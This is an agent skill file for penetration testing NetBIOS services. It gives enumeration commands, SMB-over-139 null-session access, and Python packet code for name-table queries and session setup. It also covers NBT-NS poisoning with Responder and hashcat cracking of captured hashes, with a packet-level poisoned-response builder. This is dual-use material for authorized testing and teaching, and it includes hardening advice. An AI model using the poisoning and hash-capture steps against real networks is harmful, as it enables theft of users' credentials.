pentesting-netbios

Install: `npx mdskill add xalgord/xalgorix/pentesting-netbios`

Source: SKILL.md in `.github/skills/pentesting-netbios`
---
name: pentesting-netbios
description: Testing NetBIOS over TCP/IP services during authorized engagements. Covers the NetBIOS Name Service (137/udp, 137/tcp), Datagram Service (138/udp), and Session Service (139/tcp). Focuses on name and MAC enumeration with nmblookup, nbtscan and nmap nbstat, identifying workgroups/domains, and pivoting to SMB over NetBIOS (139) for share and user enumeration.
domain: cybersecurity
subdomain: network-services-pentesting
tags:
  - penetration-testing
  - network-services
  - netbios
  - smb
  - windows
  - enumeration
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Pentesting NetBIOS (ports 137/138/139)

## When to Use

- During authorized internal network assessments when UDP 137, UDP 138, or TCP 139 is reachable
- When mapping Windows hosts on a LAN by NetBIOS name, workgroup/domain, and MAC address
- When TCP 445 is filtered but 139 is open (SMB over NetBIOS still works)
- As an early reconnaissance step before SMB/Active Directory enumeration
- When investigating NBT-NS/LLMNR poisoning opportunities for credential capture

## Quick Enumeration

```bash
# Names the server uses + MAC address (Name Service, 137)
nmblookup -A <IP>
nbtscan <IP>/30
nbtscan -r 192.168.0.1/24    # scan a /24 quickly; -r sends from source port 137 (needs root), which some older Windows hosts require
sudo nmap -sU -sV -T4 --script nbstat.nse -p137 -Pn -n <IP>
# Expected name service banner (137/udp):
#   137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)

# Session service banner (139) — confirms SMB-over-NetBIOS
nmap -p139 -sV <IP>
# Expected: 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
```

## Critical: Checks Most Often Missed

1. **Workgroup vs domain disclosure** — the NetBIOS name table reveals the workgroup or NT domain (`<1C>`/`<00>` group entries), giving you the AD/workgroup name for free before touching SMB.
2. **MAC address leak** — `nbtscan`/`nbstat` return the server MAC (the unit ID field of the node status reply), useful for vendor fingerprinting and pivoting. Windows returns the real adapter MAC; Samba's nmbd reports an all-zero MAC, which by itself fingerprints the host as Samba.
3. **Unique vs group name suffixes** — suffix bytes identify roles: `<00>` workstation, `<20>` File Server (SMB enabled), `<1B>` Domain Master Browser (often the PDC), `<1C>` Domain Controllers group. A `<20>` means the host serves SMB — pivot to share enumeration.
4. **SMB still reachable on 139** — if 445 is filtered, 139 (NBT over IP) frequently still exposes the full SMB attack surface. Point your SMB tooling at port 139. Unlike 445, a 139 session starts with a NetBIOS session request that names the server; smbclient, smbmap, impacket and crackmapexec send it for you when given the port.
5. **NBT-NS poisoning surface** — broadcast name resolution on 137/udp can be poisoned with Responder to capture NetNTLM hashes from clients on the same broadcast segment.

How to CONFIRM: NetBIOS is confirmed when `nmblookup -A <IP>` returns a name table (lines with `<XX>` suffixes) or `nbtscan` lists the name and MAC. A `<20>` suffix confirms the host runs an SMB file server reachable over 139.

## Workflow

### Step 1: Enumerate (names, workgroup/domain, MAC)

```bash
# Resolve the name table for a single host
nmblookup -A <IP>
# Read the suffixes:
#   <00> UNIQUE -> workstation / hostname
#   <00> GROUP  -> workgroup / domain name
#   <20> UNIQUE -> SMB file server service running
#   <1B> UNIQUE -> Domain Master Browser (likely PDC)
#   <1C> GROUP  -> Domain Controllers
#   <1D> UNIQUE -> Master Browser

# Sweep a subnet for live NetBIOS hosts (add -v to nbtscan to print every name per host)
nbtscan -r 192.168.0.0/24
sudo nmap -sU --script nbstat.nse -p137 -Pn -n 192.168.0.0/24
```

### Step 2: Identify roles and reachable SMB

```bash
# Confirm session service (SMB over NetBIOS) on 139
nmap -p139,445 -sV <IP>

# If 445 is filtered but 139 is open, drive SMB tooling at 139
smbclient -p 139 --no-pass -L <IP>
smbmap -P 139 -H <IP>
rpcdump.py -port 139 [[domain/]username[:password]@]<IP>   # map RPC endpoints over 139
```

### Step 3: Pivot to SMB enumeration

```bash
# Once a <20> (file server) host is found, enumerate shares/users over NetBIOS
enum4linux-ng -A <IP>
smbclient --no-pass -L <IP>
crackmapexec smb <IP> --port 139 -u '' -p '' --shares
# See the pentesting-smb skill for full share/user/credential workflow
```
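The exchange behind `nmblookup -A`, `nbtscan` and `nbstat.nse` in Steps 1 and 2, as an added example that is not part of the original skill or of those tools: a NODE STATUS REQUEST for the wildcard name `*` on UDP 137 and the parser for the reply's name table and unit ID (RFC 1002). The host name WIN-DC01, domain CORP and the MAC in the sample reply are constructed, as is the `summarize` role classification, which only applies the suffix table from Step 1.

```python
"""Node status (NBSTAT) request/response for UDP 137, RFC 1002 sections 4.2.17-4.2.18.

Added example, not code from the xalgorix skill or from nmblookup/nbtscan/nmap.
It does what those tools do on the wire: ask a host for its NetBIOS name table
with the wildcard name "*" and read back every name, its suffix, the group bit
and the unit ID (MAC). SAMPLE_RESPONSE is constructed, not captured.
"""
import socket
import struct
import sys

NBSTAT = 0x0021      # RR type of a node status query/response
CLASS_IN = 0x0001


def encode_name(name, suffix=0x00):
    """RFC 1002 first-level encoding: 15-char name + suffix byte, each byte split
    into two nibbles shifted into 'A'..'P', wrapped as one 32-byte label."""
    if name == "*":                                   # wildcard is NUL-padded, suffix 0x00
        raw = b"*" + b"\x00" * 15
    else:
        raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytes(c for b in raw for c in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))
    return bytes([len(enc)]) + enc + b"\x00"


def build_node_status_request(txid):
    """50-byte NODE STATUS REQUEST: header (flags 0 = unicast query) + '*' question."""
    header = struct.pack(">HHHHHH", txid, 0x0000, 1, 0, 0, 0)
    return header + encode_name("*") + struct.pack(">HH", NBSTAT, CLASS_IN)


def parse_node_status_response(data):
    """Return {'txid', 'names': [{'name','suffix','group','active'}], 'mac'}."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if not flags & 0x8000 or flags & 0x000F or an < 1:    # response bit set, RCODE 0
        raise ValueError("not a successful node status response")
    off = 12
    while data[off]:                                        # skip the RR_NAME labels
        off += 1 + data[off]
    off += 1
    rr_type, _rr_class, _ttl, _rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rr_type != NBSTAT:
        raise ValueError("unexpected RR type 0x%04x" % rr_type)
    num_names, off = data[off], off + 1
    names = []
    for _ in range(num_names):                              # 18 bytes per NODE_NAME entry
        entry = data[off:off + 18]
        nflags = struct.unpack(">H", entry[16:18])[0]
        names.append({
            "name": entry[:15].decode("ascii", "replace").rstrip(),
            "suffix": entry[15],
            "group": bool(nflags & 0x8000),                 # G bit: GROUP vs UNIQUE
            "active": bool(nflags & 0x0400),                # ACT bit
        })
        off += 18
    mac = ":".join("%02x" % b for b in data[off:off + 6])   # STATISTICS.UNIT_ID
    return {"txid": txid, "names": names, "mac": mac}


def summarize(table):
    """The 'checks most often missed', read straight from the parsed table."""
    out = {"hostname": None, "domain": None, "smb_file_server": False,
           "domain_controller": False, "domain_master_browser": False, "mac": table["mac"]}
    for n in table["names"]:
        key = (n["suffix"], n["group"])
        if key == (0x00, False) and out["hostname"] is None:
            out["hostname"] = n["name"]
        elif key == (0x00, True):
            out["domain"] = n["name"]          # workgroup or domain name
        elif key == (0x20, False):
            out["smb_file_server"] = True      # pivot to share enumeration over 139
        elif key == (0x1C, True):
            out["domain_controller"] = True    # the 1C group is registered only by DCs
        elif key == (0x1B, False):
            out["domain_master_browser"] = True
    return out


def build_node_status_response(txid, entries, mac):
    """Encode a NODE STATUS RESPONSE; used here only to construct offline sample data."""
    rdata = bytes([len(entries)])
    for name, suffix, group in entries:
        nflags = (0x8000 if group else 0) | 0x0400
        rdata += name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix]) + struct.pack(">H", nflags)
    rdata += mac + b"\x00" * 40                             # UNIT_ID, then 40 bytes of counters
    header = struct.pack(">HHHHHH", txid, 0x8400, 0, 1, 0, 0)   # R=1, AA=1
    return header + encode_name("*") + struct.pack(">HHIH", NBSTAT, CLASS_IN, 0, len(rdata)) + rdata


# Constructed sample: a DC named WIN-DC01 in domain CORP (names from the report template).
SAMPLE_RESPONSE = build_node_status_response(0x1337, [
    ("WIN-DC01", 0x00, False), ("CORP", 0x00, True), ("WIN-DC01", 0x20, False),
    ("CORP", 0x1C, True), ("CORP", 0x1B, False)], bytes.fromhex("005056aabbcc"))


def node_status(ip, timeout=2.0, txid=0x1337):
    """Live query (needs reach to <ip>:137/udp); equivalent to nmblookup -A <ip>."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_node_status_request(txid), (ip, 137))
        data, _ = s.recvfrom(4096)
    table = parse_node_status_response(data)
    if table["txid"] != txid:
        raise ValueError("transaction id mismatch")
    return table


if __name__ == "__main__":
    table = node_status(sys.argv[1]) if len(sys.argv) > 1 else parse_node_status_response(SAMPLE_RESPONSE)
    for n in table["names"]:
        print("%-15s <%02x> %s" % (n["name"], n["suffix"], "GROUP" if n["group"] else "UNIQUE"))
    print(summarize(table))
```

Run with no argument to walk the constructed reply, or with an IP to query a live host. The parser deliberately keys on the group bit together with the suffix: `CORP<00>` is only the domain name because it is a GROUP entry, and `CORP<1B>` is UNIQUE because only one host (the domain master browser) may hold it.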
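Why `-p 139`, `-P 139` and `--port 139` in Steps 2 and 3 work when 445 is filtered, shown at the wire level as an added example (not code from smbclient, smbmap, impacket or this skill): on 139 the client must open a NetBIOS session with a "called name" the server registered before any SMB is exchanged, and a wrong name gets a negative session response. The calling name `KALI`, the function `open_nbt_session` and the fallback to the generic called name `*SMBSERVER` are assumptions of this example; the packet layout and error codes are RFC 1002 section 4.3.

```python
"""NetBIOS Session Service handshake on 139/tcp, RFC 1002 section 4.3.

Added example, not from the xalgorix skill or from smbclient/smbmap/impacket.
On 445 a client sends SMB NEGOTIATE immediately; on 139 it must first send a
SESSION REQUEST carrying a "called name" the server registered (its <20> name)
and a "calling name" for itself. A wrong called name gets a 0x83 NEGATIVE
SESSION RESPONSE, so the helper retries with the generic "*SMBSERVER" (assumed
fallback order). The calling name KALI is constructed.
"""
import socket
import struct

SESSION_REQUEST, POSITIVE_RESPONSE, NEGATIVE_RESPONSE, RETARGET = 0x81, 0x82, 0x83, 0x84
NEGATIVE_CODES = {
    0x80: "not listening on called name",
    0x81: "not listening for calling name",
    0x82: "called name not present",
    0x83: "called name present, but insufficient resources",
    0x8F: "unspecified error",
}


def encode_name(name, suffix):
    """RFC 1002 first-level encoding of a 15-char space-padded name plus suffix byte."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytes(c for b in raw for c in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))
    return bytes([len(enc)]) + enc + b"\x00"


def build_session_request(called, calling, called_suffix=0x20, calling_suffix=0x00):
    """TYPE 0x81, FLAGS 0, LENGTH, then CALLED_NAME and CALLING_NAME (34 bytes each)."""
    body = encode_name(called, called_suffix) + encode_name(calling, calling_suffix)
    return struct.pack(">BBH", SESSION_REQUEST, 0, len(body)) + body


def parse_session_response(pkt):
    """Decode 0x82 / 0x83 / 0x84 replies into a dict the caller can act on."""
    ptype, flags, length = struct.unpack(">BBH", pkt[:4])
    length |= (flags & 0x01) << 16                       # E bit extends LENGTH to 17 bits
    body = pkt[4:4 + length]
    if ptype == POSITIVE_RESPONSE:
        return {"ok": True, "reason": "positive session response; send SMB NEGOTIATE next"}
    if ptype == NEGATIVE_RESPONSE:
        code = body[0]
        return {"ok": False, "code": code, "reason": NEGATIVE_CODES.get(code, "unknown error")}
    if ptype == RETARGET:
        ip, port = socket.inet_ntoa(body[:4]), struct.unpack(">H", body[4:6])[0]
        return {"ok": False, "retarget": (ip, port), "reason": "retarget to %s:%d" % (ip, port)}
    raise ValueError("unexpected session packet type 0x%02x" % ptype)


def called_name_candidates(name_table_names, generic="*SMBSERVER"):
    """Called names to try in order: each <20> name from the 137 name table, then the generic one."""
    return list(dict.fromkeys(list(name_table_names) + [generic]))


def open_nbt_session(ip, called_names, calling="KALI", port=139, timeout=3.0):
    """Return (socket, called_name) for the first accepted name, else raise with every rejection."""
    rejections = []
    for called in called_names:
        s = socket.create_connection((ip, port), timeout=timeout)
        try:
            s.sendall(build_session_request(called, calling))
            hdr = s.recv(4)
            length = struct.unpack(">BBH", hdr[:4])[2] | (hdr[1] & 0x01) << 16
            body = s.recv(length) if length else b""
            result = parse_session_response(hdr + body)
        except (OSError, ValueError, struct.error) as exc:
            s.close()
            rejections.append((called, str(exc)))
            continue
        if result["ok"]:
            return s, called                       # SMB NEGOTIATE now goes over this socket
        s.close()
        rejections.append((called, result["reason"]))
    raise ConnectionError("no called name accepted on %s:%d: %s" % (ip, port, rejections))


if __name__ == "__main__":
    import sys
    sock, name = open_nbt_session(sys.argv[1], called_name_candidates(sys.argv[2:]))
    print("session established on 139 with called name %r" % name)
    sock.close()
```

Usage: `python3 nbt_session.py <IP> WIN-DC01` tries the `<20>` name from the name table first and `*SMBSERVER` second. A 0x83 with code 0x82 ("called name not present") against every candidate means the session service is up but not serving SMB under any name you know, which is different from 139 being filtered.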
### Step 4: Name-service poisoning (capture credentials)

```bash
# Poison broadcast NBT-NS/LLMNR requests to capture NetNTLM hashes
sudo responder -I <iface> -wv
# Crack captured hashes offline or relay (see SMB relay in pentesting-smb)
hashcat -m 5600 captured_netntlmv2.txt wordlist.txt
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Name Service (137)** | Registers and resolves NetBIOS names; queried to obtain names and MAC (137/udp and 137/tcp) |
| **Datagram Service (138)** | Connectionless communication and broadcast messaging (138/udp) |
| **Session Service (139)** | Connection-oriented service carrying SMB over NetBIOS (139/tcp) |
| **NetBIOS name** | 16 bytes: up to 15 characters (space-padded) plus a 16th suffix byte identifying the service/role |
| **Name suffixes** | `<00>` workstation/workgroup, `<20>` file server, `<1B>` domain master browser, `<1C>` DC group |
| **NBT over IP vs SMB over IP** | Port 139 is SMB carried inside NetBIOS sessions (NBT over IP); port 445 is SMB directly over TCP/IP with no NetBIOS layer |
| **NBT-NS poisoning** | Spoofing broadcast name responses to capture NetNTLM authentication |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **nmblookup** | Resolve a host's NetBIOS name table and roles (`-A <IP>`) |
| **nbtscan** | Fast subnet sweep returning NetBIOS names and MAC addresses |
| **nmap** (nbstat.nse) | Scriptable name-table enumeration over UDP 137 |
| **enum4linux-ng** | Aggregated NetBIOS/SMB enumeration once a file server is found |
| **smbclient / smbmap** | SMB access over port 139 when 445 is filtered |
| **Responder** | NBT-NS/LLMNR poisoning to capture NetNTLM hashes |
| **impacket rpcdump.py** | Map MSRPC endpoints over NetBIOS (port 139) |

## Common Scenarios

### Scenario 1: Domain Discovery on a Flat LAN

`nbtscan -v -r 10.0.0.0/24` returns each host's full NetBIOS name table; a `<1C>` group entry exposes the AD domain name, immediately scoping the Active Directory environment.

### Scenario 2: 445 Filtered, 139 Open

A hardened host blocks 445 but leaves 139 open.
Pointing `smbclient -p 139 --no-pass -L <IP>` at the session service still enumerates shares, bypassing the partial filtering.

### Scenario 3: File Server Identification

`nmblookup -A <IP>` shows a `<20>` suffix, confirming the host runs an SMB file server. The tester pivots to share enumeration and finds a readable backup share.

### Scenario 4: Credential Capture via NBT-NS

Responder answers broadcast NetBIOS name queries for mistyped hostnames (names DNS could not resolve, so the client falls back to LLMNR and then NBT-NS), capturing NetNTLMv2 hashes that are cracked offline to recover a domain user password.

## Output Format

```
## NetBIOS Finding

**Service**: NetBIOS over TCP/IP
**Severity**: <Medium|Low|Informational>
**Host**: <IP> (137/udp, 138/udp, 139/tcp)

### Summary
<What was disclosed: hostname, workgroup/domain, MAC, file-server role, poisoning exposure>

### Name Table
| Name | Suffix | Type | Meaning |
|------|--------|------|---------|
| WIN-DC01 | <00> | UNIQUE | Hostname |
| CORP | <1C> | GROUP | Domain Controllers (domain = CORP) |
| WIN-DC01 | <20> | UNIQUE | SMB file server active |

MAC address: <xx:xx:xx:xx:xx:xx>

### Evidence
- Command: nmblookup -A <IP>
- Output: <name table excerpt>

### Recommendation
1. Disable NetBIOS over TCP/IP where not required (use DNS/SMB direct on 445)
2. Disable LLMNR and NBT-NS broadcast resolution to prevent poisoning
3. Restrict 137-139 to trusted management segments
4. Require SMB signing to mitigate relay of captured NetNTLM hashes
```
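The NBT-NS exchange that Step 4 and Scenario 4 describe, reproduced at packet level as an added example (not Responder's code and not part of this skill): the broadcast NAME QUERY a client sends for a name DNS could not resolve, and the POSITIVE NAME QUERY RESPONSE a poisoner on the segment answers with, mapping that name to its own address. The requested name `FILESRV01`, the poisoner address `10.0.0.99`, the TTL value and the `simulate_poisoning` driver are constructed for the example; the packet layouts are RFC 1002 sections 4.2.12 and 4.2.13.

```python
"""NBT-NS name query and poisoned positive response, RFC 1002 sections 4.2.12-4.2.13.

Added example for the NBT-NS poisoning step; it is not Responder's code and not
part of the xalgorix skill. It runs both sides of the exchange offline: a client
broadcasts a NAME QUERY for a name DNS could not resolve, and any host on the
segment can answer with a POSITIVE NAME QUERY RESPONSE pointing the name at its
own address. Nothing in the packet authenticates the answerer; the client only
checks the transaction id. FILESRV01 and the addresses are constructed.
"""
import struct

NB = 0x0020          # RR type of a name query / positive response
CLASS_IN = 0x0001


def encode_name(name, suffix):
    """RFC 1002 first-level encoding: 15-char space-padded name + suffix, nibbles into 'A'..'P'."""
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = bytes(c for b in raw for c in ((b >> 4) + 0x41, (b & 0x0F) + 0x41))
    return bytes([len(enc)]) + enc + b"\x00"


def decode_name(label):
    """Inverse of encode_name for a 34-byte label; returns (name, suffix)."""
    enc = label[1:1 + label[0]]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, len(enc), 2))
    return raw[:15].decode("ascii", "replace").rstrip(), raw[15]


def build_name_query(txid, name, suffix=0x20):
    """What a Windows client broadcasts to <subnet>.255:137 after DNS and LLMNR fail.
    Flags 0x0110 = OPCODE query, RD=1, B=1 (broadcast)."""
    header = struct.pack(">HHHHHH", txid, 0x0110, 1, 0, 0, 0)
    return header + encode_name(name, suffix) + struct.pack(">HH", NB, CLASS_IN)


def parse_name_query(pkt):
    """What the poisoner sees on the wire: txid, broadcast bit and the name being asked for."""
    txid, flags, qd, _an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or (flags >> 11) & 0x0F or qd != 1:   # request, OPCODE 0, one question
        raise ValueError("not a name query request")
    label = pkt[12:46]
    qtype, _qclass = struct.unpack(">HH", pkt[46:50])
    if qtype != NB:
        raise ValueError("not an NB query")
    name, suffix = decode_name(label)
    return {"txid": txid, "broadcast": bool(flags & 0x0010), "name": name, "suffix": suffix, "label": label}


def build_positive_response(query, answer_ip, ttl=165):
    """What a poisoner sends back: R=1, AA=1, RD=1 (0x8500), the question label echoed as
    RR_NAME, and one ADDR_ENTRY (NB_FLAGS 0 = unique name, B-node) carrying its own IP."""
    header = struct.pack(">HHHHHH", query["txid"], 0x8500, 0, 1, 0, 0)
    addr_entry = struct.pack(">H", 0x0000) + bytes(int(o) for o in answer_ip.split("."))
    rr = query["label"] + struct.pack(">HHIH", NB, CLASS_IN, ttl, len(addr_entry)) + addr_entry
    return header + rr


def parse_positive_response(pkt):
    """What the querying client does: accept any answer with a matching txid and RCODE 0."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", pkt[:12])
    if not flags & 0x8000 or flags & 0x000F or an < 1:
        raise ValueError("not a positive name query response")
    name, suffix = decode_name(pkt[12:46])
    _rr_type, _rr_class, ttl, rdlen = struct.unpack(">HHIH", pkt[46:56])
    addrs = []
    for off in range(56, 56 + rdlen, 6):                    # 6-byte ADDR_ENTRY list
        addrs.append(".".join(str(b) for b in pkt[off + 2:off + 6]))
    return {"txid": txid, "name": name, "suffix": suffix, "ttl": ttl, "addrs": addrs}


def simulate_poisoning(requested_name, poisoner_ip, txid=0xBEEF):
    """Run both sides offline: victim query -> poisoner answer -> victim's resolution."""
    query = build_name_query(txid, requested_name)
    seen = parse_name_query(query)                          # poisoner sniffs the broadcast
    answer = build_positive_response(seen, poisoner_ip)     # and claims the name for itself
    resolved = parse_positive_response(answer)              # victim accepts: txid matches
    if resolved["txid"] != txid:
        raise ValueError("victim would discard an answer with the wrong txid")
    return {"asked_for": seen["name"], "broadcast": seen["broadcast"],
            "resolved_to": resolved["addrs"][0], "ttl": resolved["ttl"],
            "query_hex": query.hex(), "answer_hex": answer.hex()}


if __name__ == "__main__":
    r = simulate_poisoning("FILESRV01", "10.0.0.99")
    print("victim asked for %s and will now open SMB to %s" % (r["asked_for"], r["resolved_to"]))
```

The victim's next step after accepting the answer is an SMB connection to `10.0.0.99` with NTLM authentication, which is where Responder captures the NetNTLMv2 response for `hashcat -m 5600`. The only check the client performs is the 16-bit transaction id it chose itself, which is why the recommendation in the report template is to disable NBT-NS (and LLMNR) rather than to filter answers.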